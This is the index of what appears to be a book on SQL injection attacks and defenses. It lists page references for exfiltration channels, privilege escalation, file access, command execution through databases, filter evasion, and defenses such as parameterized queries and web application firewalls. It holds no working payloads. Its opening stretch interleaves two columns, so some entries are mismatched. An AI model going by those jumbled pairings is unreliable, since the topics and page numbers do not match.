See domain name system (DNS) database server domain driven security (DDS) blind fingerprint, 149–150 internet information server (IIS), 143–144 concept, 366–368 non-blind fingerprint, 144–149 login function, 366 e-commerce application, 141 domain name system (DNS), 436–437 errors dynamic link library (DLL), 313–314 application error, 169 dynamic query, 371 generic error message, 170 dynamic string building techniques GROUP BY clause, 170 built-in command, 16 hybrid attacks, 169 error handling, 18–19 trigger, 169 escape characters handling, 14–15 verbose error messages, 168 handling types, 15–17 escalating privileges idiosyncrasies of, 15 brute-force approach, 198–199 multiple submissions handling, 19–21 CREATE PROCEDURE privilege, 202–204 parameterized queries, 13–14 Oracle, 200–202 PHP code, 14 SQL Server, 194–200 query assembly handling, 17–18 HTML code, 141 string-building techniques, 13–14 injecting into “insert” queries ASCII( ) function, 191 CASE clause, 192
Index 539 CONCAT function, 190 channels corrupt production data, 188 database connections, 267–269 Data Manipulation Language (DML), 188 DNS exfiltration, 269–273 generating insert errors, 191–193 E-mail exfiltration, 273 inserting user determined data, 188–191 HTTP exfiltration, 273–276 other scenarios, 193–194 ICMP exfiltration, 276 scalar subqueries, 192 mobile devices client-side SQL injection Android-based devices, 219–220 attacking client-side databases, 356–358 Content Providers, 219–221 local database, 355–356 inter process communication (IPC), finding and confirmation 219–220 blind SQL injection techniques, 239–249 selId parameter, 222 forcing generic errors, 235 sqlite_master table, 222 injecting queries, 235 WebContentResolver application, 220, spitting and balancing, 235–237 subquery placeholders, 238 221–222 Oracle error messages response-based techniques MySQL, 259–260 access control list (ACL) system, 173 one bit information, 264–267 concat function, 171 Oracle, 263–264 error-controllable messages, 173 PostgreSQL, 260–261 multiple rows, 173 SQL Server, 261–263 output approaches, 173 SELECT statement, 171 time-based techniques SQL*Plus command line, 171 database queries, 249–257 stragg (11g+), 173 inference considerations, 257–258 utl_inadd, 170 utl_inaddr.get_host_name function, 171 F Oracle from Web applications, 142–143 out-of-band communication finding and confirmation E-mail, 211–215 blind SQL injection techniques file system, 215–219 channel techniques, 249 HTTP/DNS, 215 inference techniques, 239–243 password hashes scenarios, 237–239 hash modification, 205 forcing generic errors, 235 MySQL, 206 four-tier architecture, 5–6 Oracle, 207–211 injecting queries, 235 PostgreSQL, 206–207 spitting and balancing SQL Server, 204–206 author parameter, 236 stacked queries, 142–143 id parmeter, 235–236 strings, 165–167 string parameter, 236–237 UNION statements data types, 153–158 G matching columns, 151–153 syntax, 150–151 GET parameters, versus POST 
parameters, 7 victim.com, 141–142 GET request, 17 vulnerable parameters, 140 exploitation H automated techniques absinthe, 276–278 HTML5 communities, 13 BSQL hacker, 278–280 HTTP exfiltration SQLBrute, 280–282 sqlninja, 283–284 HTTPURITYPE package, 273–274 squeeza, 284–286 Oracle function, 274–275 ORDER BY clause, 275 hybrid attacks cross-site scripting (XSS), 358–359 exploiting authenticated vulnerabilities, 360–361
    leveraging captured data, 358
    operating system commands, Oracle, 359–360
I
ICMP exfiltration, 276
inference techniques
  ASCII( ) function, 244
  bitstring, 248
  bitwise operations, 247
  extracting data method, 243–244
  one bit information, 239
  SQL Server database, 240
  status parameter, 242
  SUBSTRING( ) function, 242–243
  T-SQL, 247
Informix cheat sheet
  blind SQL injection functions, 527–528
  database configuration information and schema, 527
Ingres cheat sheet
  blind SQL injection functions, 528–529
  database configuration information and schema, 528, 529
Injection flaws. See SQL injection flaws
inline function
  numeric values
    exploitation, 64
    principles, 65
    single-quote delimiters, 64
    uid parameter, 63
    unique identification, 63
    visual representation, 64
  strings
    finding process, 60
    OR condition, 61
    SQL statement, 59–63
    Unclosed quotation mark error, 61
input filters
  bypassing custom filters, 347–348
  case variation, 340
  comments, 340–341
  dynamic query execution, 342–345
  non-standard entry points, 348–350
  null bytes, 345
  search Query referers, 349
  SQL injection attacks, 340
  stripped expressions, 345–346
  truncation, 346–347
  Unicode encodings, 343
  URL encoding, 341–342
input validation
  .NET, 386
  blacklisting, 383–384
  HTML5, 387
  Java
    defaultvalidator, 385
    Java server faces (JSF), 384–385
  mobile apps, 387
  PHP, 386–387
  whitelisting
    binary blob, 380
    luhn formula, 379
    known value validation, 380–383
intercepting filters
  application filters
    J2EE filter class, 420–421
    secure parameter filter (SPF), 420–421
  filtering web service messages, 422
  scripting languages, filter pattern, 421–422
  web server filters
    application program interface (API), 417–418
    UrlScan, 419
    WebKnight, 419–420
Internet information server (IIS), 334
Intrusion detection systems (IDSs), 345, 424–425
J
Java applications
  coding behavior recognition, 97–98
  dangerous functions, 102
  data process, 109–110
Java database connectivity (JDBC), 102, 372
K
keyword-blocking filter, 340
M
Mail Transfer Agents (MTA), 273
Microsoft access databases, 530–531
Microsoft code analysis tool .NET (CAT.NET), 131–132
Microsoft SQL Server
  database
    O’Boyle string, 391
    preceding characters, 392–393
    transact-SQL code, 391
    wildcard character, 392–393
  encoding output, database, 390–393
  execution plan, database, 458–459
  object timestamps, database, 469
  operating system commands
    .NET binary, 321
    ipconfig command, 318–319
    surface area configuration, 319
    xp_cmdshell, 318–319
  reading files
    .NET binary, 301
    ActiveX control, 300–301
    ALTER ASSEMBLY command, 303
    bulk insert method, 297
    common language runtime (CLR), 301–303
    communication mechanism, 299
    CREATE ASSEMBLY function, 302
    domain name system (DNS), 296–297
    file system object, 300–301
    net.exe, 299
    OLE automation, 300
    query analyzer, 298
    RDBMS, 297
    remote file servers, 299
    scripting.filesystemobject, 300–301
    security development lifecycle (SDL), 296–297
    stolen-boot.ini, 299–300
    SYSADMIN group, 304
    union query, 297
  transaction log, 463–465
  writing files
    binary files, 310
    bulk copy program (BCP), 311
    csc.exe, 314–315
    DOS copy command, 311–312
    dynamic link library (DLL), 313–314
    echo commands, 312
    file compiling, 314–315
    filesystemobject, 310
    meterpreter, 313–314
    remote database server, 312–315
    sp_oacreate, 310
    UNIX, 312–313
    worms, 312
Microsoft SQL server cheat sheet
  blind SQL injection functions, 504
  database configuration information and schema, 500–504
  database server attacking
    cracking database passwords, 507
    file read/write, 508
    server 2005 hashes, 507–508
    xp_cmdshell, 506–507
  OPENROWSET reauthentication attack, 505–506
  server privilege escalation, 504–506
mssql_execute( ) and odbc_prepare( ), 105–106
MySQL
  administrative privileges, 178
  database
    stored procedure code, 393–394
    string terminator, 393–394
    wildcards, 394
  database schema enumeration, 178–183
  delays in database queries, 250–252
  E-mail system, 211–214
  encoding output, database, 393–394
  execution plan, database, 459–460
  file system, 218–219
  hierarchical approach, 178
  INTO OUTFILE, 218, 219
  MYD files, 183
  mysql and information_schema, 178, 179
  object timestamps, database, 470–471
  operating system commands
    ASP.NET, 318
    Hackproofing, 318
    WAMP Environments, 318
  out-of-band communication, 211–214
  output tables, 182
  password hashes, 206
  PASSWORD( ) function, 206
  reading files
    binary files, 295, 296
    database, 292
    DEBUG message, 292
    hackproofing, 295
    HEX( ) function, 295
    LOAD DATA INFILE command, 291
    LOAD_FILE function, 292, 295–296
    NGS Software, 295
    queries, 294
    remote file system, 295
    substring function, 296
    text file, 291–292
    union statement, 292–294
    universal naming convention (UNC), 296
    vulnerable intranet application, 293
  response-based techniques, 259–260
  transaction log, 466–468
  writing files
    apache.org, 309
    binary files, 308
    built-in function, 308
    dumpfile, 307–308
    hackproofing, 310
    LOAD DATA INFILE command, 307
    UNHEX( ), 308
    user-defined function (UDF), 310
MySQL cheat sheet
  blind SQL injection functions, 508
  database configuration information and schema, 508
  database server attacking
    cracking database passwords, 510
    database directly attacking, 510–511
    file read, 511
    file write, 511
    system command execution, 509–510
O
open Web application security project (OWASP), 405
Operating system exploitation
  consolidating access, 333–335
  database programmers, 289
  executing commands
    Microsoft SQL Server, 318–322
    MySQL, 318
    Oracle, 322–330
    PostgreSQL, 330–333
  file system accessing
    reading files, 290–306
    writing files, 306–317
Oracle
  columns and data type, 185
  components
    APEX, 209
    Oracle internet directory (OID), 209–211
  concept, 201
  data encryption standard (DES) password hashes, 207
  database
    dbms_assert, 390
    O’Boyle, 389
    preceding functions, 390
    quote character, 390
  database schema enumeration, 184–188
  database server, 214
  DBA privileges, 201
  delays in database queries, 257
  E-mail system, 214–215
  encoding output, database, 388–395
  escalating privileges, 200–202
  execution plan, database, 459
  file system, 219
  mixed-case characters, 207
  multiple databases, 184
  object timestamps, database, 469–470
  operating system commands
    alter system, 329
    buffer overflow, 329
    code execution via direct access, 325–330
    custom application code, 329–330
    DBMS_SCHEDULER, 326–327
    EXTPROC, 325–326
    Java, 326
    PL/SQL native, 327–328
    PL/SQL native 9i, 329
    privilege escalation, 322–325
    SYSDBA privileges, 330
    text, 328–329
  out-of-band communication, 214–215
  password hashes, 207–211
  PL/SQL code, 200–201
  privilege types, 185–186
  reading files
    access files, 304
    Java, 304–306
    select statements, 305
    utl_file_dir database, 304, 306
  response-based techniques, 263–264
  SYS.DBMS_CDC_PUBLISH, 202
  SYS.LT, 201–202
  transaction log, 465–466
  writing files
    binary code, 315
    DBMS_ADVISOR, 315
    Java, 315–316
    methods, 315
Oracle cheat sheet
  blind SQL injection functions, 511, 513
  database configuration information and schema, 511–513
  database server attacking
    command execution, 513–514
    cracking database passwords, 516–517
    PL/SQL reading local files, 514–515
    PL/SQL writing local files, 515–516
    reading local files, 514
Oracle PL/SQL and Microsoft Transact-SQL (T-SQL) code
  authid clause, 118–119
  built-in database, 118–119
  data definition language (DDL) statements, 119–120
  database administrators (DBAs), 121
  EXEC( ), 123
  EXECUTE function, 121–122
  information_schema database, 126
  LIKE statement, 120
  sp_helptext, 123
  SQL Server 2008 database, 125
  stored procedures, 123–125
  user-controlled data, 121
P
parameterized statement
  .NET (C#)
    ADO.NET framework, 373–374
    OleDbClient, 375
  HTML5 browser storage
    Web SQL Database specification, 378
    Web Storage Specification, 379
  Java
    hibernate, 373
    JDBC framework, 372
  mobile apps
    Android applications, 378
    iOS applications, 377–378
  PHP
    data objects, 376
    PDO package, 376–377
    PL/SQL, 377
pattern-matching filters, 340–341
payment card industry data security standards (PCI-DSS), 402–403
PHP applications
  $input variable, 108, 109
  $sql variable, 107
  awk function, 105
  grep strings, 106
  mssql_execute( ) and odbc_prepare( ), 105–106
  user-controlled data, 108, 109
platform-level defenses
  Application Intrusion Detection Systems (IDSs), 424–425
  Aspect-oriented Programming (AOP), 424
  database firewall, 425
  intercepting filters
    application filters, 420–421
    filter pattern, scripted languages, 421–422
    filtering web service messages, 422
    web server and application filters, 417–420
  non-editable versus editable input protection, 422
  runtime protection technologies and techniques
    code changes, 410
    Commercial off-the-shelf (COTS) applications, 410
    URL/page-level strategies
      HTTP Handler configuration, 423
      page overriding, 423
      resource proxying/wrapping, 424
      substitute servlet configuration, 423
      URL rewriting, 423–424
  web application firewall (WAF), 411–417
    generic attacks rule file, 413
    ModSecurity, 411–417
    SecRule, generic syntax, 411–412
PostgreSQL
  administrative privileges, 206
  database
    pq_escape_string( ), 394
    string terminator, 394
  database schema enumeration, 183–184
  delays in database queries, 252–254
  encoding output, database, 394–395
  execution plan, database, 460–461
  hierarchical approach, 183
  ILIKE clause, 184
  MD5, 207
  object timestamps, database, 471–472
  operating system commands, 330–333
  password hashes, 206–207
  reading files
    COPY function, 306
    ‘/etc/passwd’ file, 306
  response-based techniques, 260–261
  transaction log, 468
  writing files
    COPY function, 316
    PHP programming language, 316
    sqlmap supports, 317
    super user privileges, 316
PostgreSQL cheat sheet
  blind SQL injection functions, 518
  database configuration information and schema, 517–518
  database server attacking
    cracking database passwords, 519–520
    local file access, 519
    system command execution, 519
R
Relational database management system (RDBMS), 297
response-based techniques
  MySQL
    FALSE inference, 259
    TRUE inference, 259
    Web application, 259
  one bit information
    binary search method, 266–267
    CASE statement, 265–266
  Oracle
    CAST( ), 264
    key bits, 263
  PostgreSQL
    error management, 261
    PAUSE( ) function, 261
  SQL Server
    ASP.NET, 262–263
    CASE statement, 263
reviewing source code
  $param, 90–91
  Android application code
    Content-Providers, 111–112, 115, 116
    SQLiteDatabase, 112–114
    SQLiteQueryBuilder, 112–114
    sqlmap, 112–114
    WebContentResolver, 112
  automated tools
    abstract syntax tree (AST), 127
    AppCodeScan, 130
    AppScan Source Edition, 135
    CodePro AnalytiX, 132
    CodeSecure, 135
    command-line utilities, 126–127
    control flow graph (CFG), 127
    Klocwork Solo, 135–136
    lexical analysis, 127
    Microsoft analyzer, 131
    Microsoft code analysis tool .NET (CAT.NET), 131–132
    mysql_query( ) function, 127
    OWASP LAPSE+ project, 130–131
    PHP scripts, vulnerabilities in, 132
    Pixy, 129–130
    RIPS, 132
    source code analyzers (SCAs), 133–134
    static analysis, 134–135
    Teachable Static Analysis Workbench (TeSA), 132–133
    yet another source code analyzer (YASCA), 129
  coding behavior recognition
    build and execute statements, 92–93
    C# applications, 98–99
    dynamic string-building techniques, 92
    EXECUTE function, 93, 94
    HTML form, 95
    HTTP headers, 95
    Java application, 97–98
    METHOD attribute, 95
    Oracle stored procedures, 94
    PHP function and code, 96
    string concatenation, 92
    user-controlled input, 94–95
  dangerous functions
    C#, 103–104
    Java application, 102
    java.sql, 102
    PHP scripting language, 99–102
    vulnerable applications, 99
  data process
    C#, 110–111
    grep tool, 104
    integrated development environment (IDE), 104
    Java, 109–110
    PHP, 104–111
  dynamic code analysis, 89–90
  methodical approach, 90
  methods, 89–90
  PHP code, 90–91
  PL/SQL and T-SQL code
    authid clause, 118–119
    built-in database, 118–119
    data definition language (DDL) statements, 119–120
    database administrators (DBAs), 121
    EXEC( ), 123
    EXECUTE function, 121–122
    information_schema database, 126
    LIKE statement, 120
    sp_helptext, 123
    SQL Server 2008 database, 125
    stored procedures, 123–125
    user-controlled data, 121
  security-sensitive function, 90
  sinks, 92
  static code analysis, 89–90
  user-controlled data, 91
ROLE privileges, 185–187
S
sanitizing filters, 345, 346
SAP MAX DB (SAP DB), 15
second-order SQL injection
  address book application, 350–352
  bugs, 354
  HTTP request and response, 350
  second-order vulnerabilities, 352–355
Secure sockets layer (SSL), 437
simple mail transfer protocol (SMTP), 273
simple object access protocol (SOAP), 334–335
SQL injection flaws, 12
SQL injection vulnerabilities
  CMS application, 7–8
  dynamic string building
    built-in command, 16
    error handling, 18–19
    escape characters handling, 14–15
    handling types, 15–17
    idiosyncrasies of, 15
    multiple submissions handling, 19–21
    parameterized queries, 13–14
    PHP code, 14
    query assembly handling, 17–18
    string-building techniques, 13–14
  e-commerce application, 2, 6
  GET versus POST parameters, 7
  high-profile Web sites
    Common Vulnerabilities and Exposures (CVE), 9–10
    hacking Web applications, 11–12
    malicious script, 12
    script kiddies, 12
  HTTP-delivered enterprise applications, 6
  insecure database configuration
    built-in stored procedures, 21
    commands, 22
    database administrator (DBA) privileges, 22–23
    database metadata, 22
    Oracle, 22–23
    SYSTEM privileges, 21
  login.php script, 8
  MySQL database, 23
  parsing and execution, 6
  programming languages, 13
  Web applications works
    database-driven, 2
    four-tier architecture, 5–6
    PHP script, 3
    three-tier architecture, 4–5
SQL Server
  brute-force mode, 197
  columns, 176
  database schema enumeration, 175–178
  database table extraction, 218
  delays in database queries, 254–257
  e-commerce application, 175
  e-shop database, 176
  escalating privileges, 194–200
  file system
    –U and –P parameters, 218
    bcp.exe, 217
    password hash, 216–217
    queryout parameter, 217
    sql_logins table, 216
  fn_varbintohexstr( ), 205
  OPENROWSET command, 194–195
  out-of-band communication, 216–218
  password hashes, 204–206
  pwdencrypt( ), 204
  remote database server, 175
  response-based techniques, 261–263
  server file system, 216
  sp_addsrvrolemember procedure, 195
  sysxlogins table, 205
  UNION SELECT, 177
  unpatched servers, 199–200
  WAITFOR DELAY, 197
sqlmap
  command-line automation, 224
  par excellence, 224
  Python, 224–225
squeeza, 284–286
SSL. See Secure sockets layer (SSL)
structured query language (SQL) primer
  bypassing input validation filters
    HTTP encoding, 521, 522
    quote filters, 520–521
  DB2 cheat sheet
    blind SQL injection functions, 526, 527
    database configuration information and schema, 526
  Informix cheat sheet
    blind SQL injection functions, 527–528
    database configuration information and schema, 527
  Ingres cheat sheet
    blind SQL injection functions, 528–529
    database configuration information and schema, 528, 529
  injection
    combine multiple rows and columns, 499
    database platform identification, 495–497
    vulnerabilities, 492–495
  materials resources
    cheat sheets, 531
    exploit tools, 531–532
    password cracking tools, 532
    white papers, 531
  Microsoft SQL server cheat sheet
    blind SQL injection functions, 504
    database configuration information and schema, 500–504
    database server attacking, 506–508
    microsoft SQL server privilege escalation, 504–506
    OPENROWSET reauthentication attack, 505–506
  MySQL cheat sheet
    blind SQL injection functions, 508
    database configuration information and schema, 508
    database server attacking, 508–511
  Oracle cheat sheet
    blind SQL injection functions, 511, 513
    database configuration information and schema, 511–513
    database server attacking, 511–517
  PostgreSQL cheat sheet
    blind SQL injection functions, 518
    database configuration information and schema, 517–518
    database server attacking, 518–520
  SQL queries
    ALTER TABLE statement, 490
    CREATE TABLE statement, 488–490
    DELETE statement, 488
    DROP statement, 488
    GROUP BY statement, 490
    INSERT statement, 487–488
    ORDER BY clause, 490–491
    result set limitation, 491–492
    SELECT statement, 486–487
    UNION operator, 487
    UPDATE statement, 488
  Sybase cheat sheet
    blind SQL injection functions, 530
    database configuration information and schema, 529–530
  troubleshooting SQL injection attacks, 521–525
SUBSTRING( ) function, 242–243
Sybase cheat sheet
  blind SQL injection functions, 530
  database configuration information and schema, 529–530
SYSTEM privileges, 185–187
T
TABLE privileges, 185–187
TCP. See transmission control protocol (TCP)
testing and inference
  application response
    back-end database, 49
    different inputs, 53–54
    generic errors, 49–52
    HTTP code errors, 52–53
  automating discovery
    database error, 76
    GET and POST requests, 76
    HP Scrawlr, 80–82
    HP WebInspect, 77–79
    IBM Rational AppScan, 79–80
    Paros Proxy, 83–85
    SQLiX, 82–83
    tasks, 76
    Zed Attack Proxy, 83–85
  blind injection detection, 54–58
  confirming and terminating
    back-end server, 70
    BENCHMARK function, 75
    database comment syntax, 65–67
    database concatenation operators, 69, 70
    DBMS_LOCK.SLEEP( ) function, 76
    executing multiple statement, 70–74
    exploitation, 68
    inline function, 59–65
    multiline comments, 68, 69
    numbers and strings, 58–59
    statement, 65
    testing string, 70
    time delays, 74–76
    trial-and-error process, 58
    Victim Inc, 67
  database errors
    Microsoft SQL Server, 38–42
    MySQL, 42–45
    Oracle, 45–47
    PostgreSQL, 47–49
    triggers, 37
  GET requests, 29
  information workflow, 35
  injectable data, 31–32
  manipulating parameters, 32–35
  POST requests, 29–31
  Trigger anomalies, 28
three-tier architecture, 4–5
tiered architecture, basic concept of, 5–6
time-based techniques
  database queries
    methods, 249
    MySQL delays, 250–252
    Oracle delays, 257
    PostgreSQL delays, 252–254
    SQL Server delays, 254–257
  inference considerations, 257–258
transaction log
  analysis, 463–468
  Microsoft SQL Server, 463–465
  MySQL, 466–468
  Oracle, 465–466
  PostgreSQL, 468
transmission control protocol (TCP), 267, 296–297
troubleshooting SQL injection attacks, 521–525
U
UNION statements
  data types
    back-end database, 156
    brute-force guessing, 153–154
    cast operators, 156
    integer and string, 154
    looping statement, 158
    multiple data, 155
    NULL clause, 153
    SELECT queries, 156
    system_user and db_name( ), 155
    WHERE clause, 157
  matching columns
    database server technology, 151
    ORDER BY clause, 152–153
    products.asp, 152
    requirements, 151
  syntax, 150–151
universal naming convention (UNC), 296
user datagram protocol (UDP), 312
user-defined function (UDF), 310, 330
userid, 8
V
virtual private database (VPD), 404
W
Web application firewalls (WAF), 339–340
  HTTP/HTTPS, 411
  ModSecurity
    configurable rule set, 411–414
    generic attacks rule file, 413
    intrusion detection capabilities, 416–417
    request normalization, 415–416
    REQUEST variables and coverage, 414–415
    response analysis, 416
    SecRule, generic syntax, 411–412
    SQL errors leakage rule, 416
    transformation functions, 415
    Whitelist rule, 414
Web applications
  content management system (CMS), 8
  CVE requests, 9–10
  database-driven, 2
  e-commerce application, 2
  four-tier architecture, 5–6
  hybrid attacks
    creating cross-site scripting (XSS), 358–359
    exploiting authenticated vulnerabilities, 360–361
    leveraging captured data, 358
    operating system commands, Oracle, 359–360
  input filters
    bypassing custom filters, 347–348
    case variation, 340
    comments, 340–341
    dynamic query execution, 342–345
    non-standard entry points, 348–350
    null bytes, 345
    search Query referers, 349
    SQL injection attacks, 340
    stripped expressions, 345–346
    truncation, 346–347
    Unicode encodings, 343
    URL encoding, 341–342
  OWASP lists injection, 9–10
  PHP script, 3
  programming languages, 13
  RDBMS, 19
  three-tier architecture, 3–5
  Web environment, 27–28
  Web infrastructure configuration, 439–440
Web server and application filters, 417–420
Web Services Description Language (WSDL), 438
X
XSS. See cross-site scripting (XSS)
Z
Zone-H, 10